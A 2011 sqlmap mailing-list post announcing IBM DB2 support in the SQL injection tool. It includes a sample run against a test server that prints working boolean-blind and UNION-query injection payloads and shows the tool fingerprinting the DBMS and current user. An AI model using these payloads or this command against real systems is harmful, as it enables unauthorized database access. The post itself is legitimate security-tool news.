Hi,

Update on IBM DB2 support: payload for time-based has been added[1]
last week as well as support for direct connection (-d switch).

[1] https://twitter.com/#!/sqlmap/status/85659702565937152


On 25 June 2011 11:04, Bernardo Damele A. G. <bernardo.dam...@gmail.com> wrote:
> Hi,
>
> The long awaited IBM DB2 support has been implemented in sqlmap. The
> patch has been provided by Sebastian Bittig of r-tec IT Systeme GmbH
> and merged in sqlmap repository after some tweaking by us. It is very
> stable for both DB2 8.x and 9.x branches.
> The patch includes support to fingerprint and enumerate data on IBM
> DB2 via boolean-based blind SQL injection and UNION query SQL
> injection. Hopefully, soon someone will come up with a payload for
> time-based and error-based techniques too. Support for direct
> connection to the DBMS (-d switch) will be implemented soon as well.
>
> Thank you Sebastian and the rest of the team at r-tec for your patch
> and support!
>
> Sample run against an IBM DB2 9.7 test environment:
> --8<--
> $ python sqlmap.py -u http://TARGET/page.php?id=1 -f -b --current-user
>
>    sqlmap/1.0-dev (r4182) - automatic SQL injection and database takeover tool
>    http://sqlmap.sourceforge.net
>
> [!] legal disclaimer: usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility
> to obey all applicable local, state and federal laws. Authors assume
> no liability and are not responsible for any misuse or damage caused
> by this program
>
> [*] starting at 10:56:21
>
> [10:56:21] [INFO] using
> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/TARGET/session'
> as session file
> [10:56:21] [INFO] testing connection to the target url
> [10:56:23] [INFO] heuristics detected web page charset 'ascii'
> [10:56:23] [INFO] testing if the url is stable, wait a few seconds
> [10:56:25] [INFO] url is stable
> [10:56:25] [INFO] testing if GET parameter 'id' is dynamic
> [10:56:26] [INFO] confirming that GET parameter 'id' is dynamic
> [10:56:26] [INFO] GET parameter 'id' is dynamic
> [10:56:27] [INFO] heuristic test shows that GET parameter 'id' might
> be injectable (possible DBMS: DB2)
> [10:56:27] [INFO] testing sql injection on GET parameter 'id'
> [10:56:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [10:56:32] [INFO] GET parameter 'id' is 'AND boolean-based blind -
> WHERE or HAVING clause' injectable
> parsed error message(s) showed that the back-end DBMS could be DB2. Do
> you want to skip test payloads specific for other DBMSes? [Y/n]
> [10:56:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [10:56:49] [INFO] target url appears to be UNION injectable with 1 columns
> [10:56:51] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) -
> 1 to 10 columns' injectable
> GET parameter 'id' is vulnerable. Do you want to keep testing the others? 
> [y/N]
> sqlmap identified the following injection points with a total of 21
> HTTP(s) requests:
> ---
> Place: GET
> Parameter: id
>    Type: boolean-based blind
>    Title: AND boolean-based blind - WHERE or HAVING clause
>    Payload: id=1' AND 7118=7118 AND 'Skhh'='Skhh
>
>    Type: UNION query
>    Title: Generic UNION query (NULL) - 1 to 10 columns
>    Payload: id=1' UNION ALL SELECT
> CHR(58)||CHR(110)||CHR(114)||CHR(114)||CHR(58)||CHR(90)||CHR(103)||CHR(65)||CHR(88)||CHR(66)||CHR(109)||CHR(69)||CHR(74)||CHR(77)||CHR(117)||CHR(58)||CHR(101)||CHR(113)||CHR(108)||CHR(58)
> FROM SYSIBM.SYSDUMMY1--  AND 'QrLM'='QrLM
> ---
>
> [10:58:58] [INFO] testing IBM DB2
> [10:58:59] [INFO] confirming IBM DB2
> [10:59:12] [INFO] the back-end DBMS is IBM DB2
> web server operating system: Windows
> web application technology: PHP 5.3.5, Apache 2.2.17
> back-end DBMS: active fingerprint: IBM DB2 9.7
>               html error message fingerprint: DB2
> [10:59:12] [INFO] fetching banner
> banner:    'DB2 v9.7.400.501'
>
> [10:59:13] [INFO] fetching current user
> current user:    'TEST'
> --8<--
>
> Bernardo
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949)
> PGP Key ID: Unavailable
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

------------------------------------------------------------------------------
All of the data generated in your IT infrastructure is seriously valuable.
Why? It contains a definitive record of application performance, security 
threats, fraudulent activity, and more. Splunk takes this data and makes 
sense of it. IT sense. And common sense.
http://p.sf.net/sfu/splunk-d2d-c2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to